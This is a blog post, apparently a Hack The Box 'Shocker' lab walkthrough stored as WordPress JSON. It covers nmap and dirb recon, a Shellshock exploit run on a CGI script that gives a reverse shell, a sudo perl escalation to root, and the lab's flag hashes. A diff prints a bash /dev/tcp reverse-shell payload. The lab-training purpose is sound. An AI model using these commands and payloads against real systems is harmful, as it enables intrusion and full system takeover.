{"id":3740,"date":"2020-08-16T17:25:46","date_gmt":"2020-08-16T08:25:46","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3740"},"modified":"2020-08-30T23:33:15","modified_gmt":"2020-08-30T14:33:15","slug":"hack-the-box-shocker-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3740","title":{"rendered":"Hack The Box &#8211; Shocker &#8211; Walkthrough"},"content":{"rendered":"<h3>SMB is exposed<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 shocker.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 03:23 UTC\r\nNmap scan report for shocker.htb (10.10.10.56)\r\nHost is up (0.045s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\r\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\r\n|_http-title: Site doesn't have a title (text\/html).\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nDevice type: print server|printer|general purpose|VoIP phone|broadband router\r\nRunning (JUST GUESSING): HP embedded (90%), IBM AIX 4.X (86%), Tadiran embedded (85%), Wind River VxWorks 5.X (85%), Motorola embedded (85%), Microsoft Windows 2003|XP (85%)\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000 cpe:\/o:ibm:aix:4.3 cpe:\/h:tadiran:flexset-ip_280s cpe:\/o:windriver:vxworks:5.4 cpe:\/h:motorola:surfboard_sbv5121 cpe:\/o:microsoft:windows_server_2003::sp2 cpe:\/o:microsoft:windows_xp\r\nAggressive OS guesses: HP 170X print server or Inkjet 3000 printer (90%), HP LaserJet 4250 printer (87%), IBM AIX 4.3 (86%), Tadiran FlexSet-IP 280S VoIP phone (85%), Motorola SURFboard SBV5121 broadband router (VxWorks 5.4) (85%), Microsoft Windows Server 2003 SP2 (85%), Microsoft Windows XP (85%), Microsoft Windows XP SP3 (85%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 
hops\r\n<\/pre>\n<h3>Try accessing port 80<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-288x300.png\" alt=\"\" width=\"288\" height=\"300\" class=\"alignnone size-medium wp-image-3741\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-288x300.png 288w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950-768x799.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-16_122950.png 974w\" sizes=\"(max-width: 288px) 100vw, 288px\" \/><\/a><br \/>\ngobuster could not find any folders.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# gobuster dir -u http:\/\/shocker.htb -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n===============================================================\r\nGobuster v3.0.1\r\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)\r\n===============================================================\r\n&#x5B;+] Url:            http:\/\/shocker.htb\r\n&#x5B;+] Threads:        10\r\n&#x5B;+] Wordlist:       \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt\r\n&#x5B;+] Status codes:   200,204,301,302,307,401,403\r\n&#x5B;+] User Agent:     gobuster\/3.0.1\r\n&#x5B;+] Timeout:        10s\r\n===============================================================\r\n2020\/08\/16 03:30:41 Starting gobuster\r\n===============================================================\r\nProgress: 65661 \/ 220561 (29.77%)\r\n<\/pre>\n<p>Using dirb, we find that \/cgi-bin\/user.sh exists.<\/p>\n<pre class=\"brush: plain; title: ; 
notranslate\" title=\"\">\r\n# dirb http:\/\/shocker.htb\/\r\n\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\n\r\nSTART_TIME: Sun Aug 16 07:39:22 2020\r\nURL_BASE: http:\/\/shocker.htb\/\r\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\r\n\r\n-----------------\r\n\r\nGENERATED WORDS: 4612\r\n\r\n---- Scanning URL: http:\/\/shocker.htb\/ ----\r\n+ http:\/\/shocker.htb\/cgi-bin\/ (CODE:403|SIZE:294)\r\n+ http:\/\/shocker.htb\/index.html (CODE:200|SIZE:137)\r\n+ http:\/\/shocker.htb\/server-status (CODE:403|SIZE:299)\r\n\r\n-----------------\r\nEND_TIME: Sun Aug 16 07:57:47 2020\r\nDOWNLOADED: 4612 - FOUND: 3\r\n\r\n# dirb http:\/\/shocker.htb\/cgi-bin\/ -w \/usr\/share\/dirb\/common.txt -X .sh\r\n\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\n\r\nSTART_TIME: Sun Aug 16 08:01:30 2020\r\nURL_BASE: http:\/\/shocker.htb\/cgi-bin\/\r\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\r\nOPTION: Not Stopping on warning messages\r\nEXTENSIONS_LIST: (.sh) | (.sh) &#x5B;NUM = 1]\r\n\r\n-----------------\r\n\r\nGENERATED WORDS: 4612\r\n\r\n---- Scanning URL: http:\/\/shocker.htb\/cgi-bin\/ ----\r\n+ http:\/\/shocker.htb\/cgi-bin\/user.sh (CODE:200|SIZE:118)\r\n\r\n-----------------\r\nEND_TIME: Sun Aug 16 08:20:29 2020\r\nDOWNLOADED: 4612 - FOUND: 1\r\n<\/pre>\n<h3>Given the machine name, try ShellShock<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# searchsploit shellshock\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                 |  Path\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nAdvantech Switch - 'Shellshock' 
Bash Environment Variable Command Injection (Metasploit)                       | cgi\/remote\/38849.rb\r\nApache mod_cgi - 'Shellshock' Remote Command Injection                                                         | linux\/remote\/34900.py\r\nBash - 'Shellshock' Environment Variables Command Injection                                                    | linux\/remote\/34766.php\r\nBash CGI - 'Shellshock' Remote Command Injection (Metasploit)                                                  | cgi\/webapps\/34895.rb\r\nCisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)                                              | hardware\/remote\/39568.py\r\ndhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)                                        | linux\/remote\/36933.py\r\nGNU Bash - 'Shellshock' Environment Variable Command Injection                                                 | linux\/remote\/34765.txt\r\nIPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)                                 | cgi\/remote\/39918.rb\r\nNUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)                                                   | cgi\/webapps\/40213.txt\r\nOpenVPN 2.2.29 - 'Shellshock' Remote Command Injection                                                         | linux\/remote\/34879.txt\r\nPHP &lt; 5.6.2 - 'Shellshock' Safe Mode \/ disable_functions Bypass \/ Command Injection                            | php\/webapps\/35146.txt\r\nPostfix SMTP 4.2.x &lt; 4.2.48 - 'Shellshock' Remote Command Injection                                            | linux\/remote\/34896.py\r\nRedStar 3.0 Server - 'Shellshock' 'BEAM' \/ 'RSSMON' Command Injection                                          | linux\/local\/40938.py\r\nSun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)                  | cgi\/webapps\/39887.txt\r\nTrendMicro InterScan Web Security Virtual Appliance - 
'Shellshock' Remote Command Injection                    | hardware\/remote\/40619.py\r\n--------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n\r\n# searchsploit -m linux\/remote\/34900.py\r\n\r\n# sed -i 's\/\\r\/\/' 34900.py\r\n\r\n# python 34900.py payload=reverse rhost=10.10.10.56 lhost=172.17.0.2 lport=4444 pages=\/cgi-bin\/user.sh\r\n&#x5B;!] Started reverse shell handler\r\n&#x5B;-] Trying exploit on : \/cgi-bin\/user.sh\r\n&#x5B;!] Successfully exploited\r\n&#x5B;!] Incoming connection from 172.17.0.1\r\n172.17.0.1&gt; id\r\nuid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)\r\n\r\n172.17.0.1&gt; pwd\r\n\/usr\/lib\/cgi-bin\r\n\r\n172.17.0.1&gt; cat \/home\/shelly\/user.txt\r\n2ec24e11320026d1e70ff3e16695b233\r\n\r\n172.17.0.1&gt; sudo -l\r\nMatching Defaults entries for shelly on Shocker:\r\n    env_reset, mail_badpass,\r\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser shelly may run the following commands on Shocker:\r\n    (root) NOPASSWD: \/usr\/bin\/perl\r\n\r\n172.17.0.1&gt; sudo \/usr\/bin\/perl -e 'exec &quot;\/bin\/bash&quot;;'\r\n172.17.0.1&gt; id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n172.17.0.1&gt; cat \/root\/root.txt\r\n52c2715605d70c7619030560dc1ca467\r\n<\/pre>\n<p>Because Kali Linux is running in Docker, 34900.py has been partially modified.<\/p>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# diff 34900.py \/usr\/share\/exploitdb\/exploits\/linux\/remote\/34900.py\r\n76c76\r\n&lt;               payload = &quot;() { :;}; \/bin\/bash -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/10.10.14.7\/&quot;+str(lport)+&quot; 0&gt;&amp;1 &amp;&quot;\r\n---\r\n&gt;               
payload = &quot;() { :;}; \/bin\/bash -c \/bin\/bash -i &gt;&amp; \/dev\/tcp\/&quot;+lhost+&quot;\/&quot;+str(lport)+&quot; 0&gt;&amp;1 &amp;&quot;\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SMB is exposed # nmap -A -n -F -T5 shocker.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-16 03:23 UTC Nm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3740"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740\/revisions"}],"predecessor-version":[{"id":3783,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3740\/revisions\/3783"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3740"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3740"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3740"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}